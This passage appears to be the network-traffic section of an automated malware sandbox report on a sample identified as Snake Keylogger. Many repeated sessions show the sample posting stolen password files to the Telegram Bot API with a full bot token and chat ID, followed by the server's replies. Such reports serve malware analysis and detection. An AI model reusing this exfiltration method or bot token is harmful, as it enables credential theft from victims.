                                                                    2022-06-26 07:32:59 UTC80INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66795,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228779,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    48192.168.2.549825149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:59 UTC81OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e0bfbe99
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:59 UTC81OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 30 62 66 62 65 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e0bfbe99Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:59 UTC81INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:59 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:59 UTC82INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66796,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228779,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    49192.168.2.549827149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:59 UTC82OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e0fb5a83
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:59 UTC83OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 30 66 62 35 61 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e0fb5a83Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:00 UTC83INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:59 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:00 UTC83INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66797,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228779,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    5192.168.2.549773149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:40 UTC8OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d57ae485
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:40 UTC8OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 35 37 61 65 34 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d57ae485Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:40 UTC9INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:40 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:40 UTC9INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66751,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228760,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    50192.168.2.549829149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:00 UTC84OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e13958ac
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:00 UTC84OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 31 33 39 35 38 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e13958acContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:00 UTC85INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:00 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:00 UTC85INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66799,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228780,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    51192.168.2.549830149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:00 UTC86OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e16dcca0
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:00 UTC86OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 31 36 64 63 63 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e16dcca0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:00 UTC86INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:00 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:00 UTC87INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66800,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228780,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    52192.168.2.549833149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:00 UTC87OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e1abc791
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:00 UTC88OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 31 61 62 63 37 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e1abc791Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:01 UTC88INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:01 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:01 UTC89INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66801,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228781,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    53192.168.2.549838149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:01 UTC89OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e1e9c42e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:01 UTC89OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 31 65 39 63 34 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e1e9c42eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:01 UTC90INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:01 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
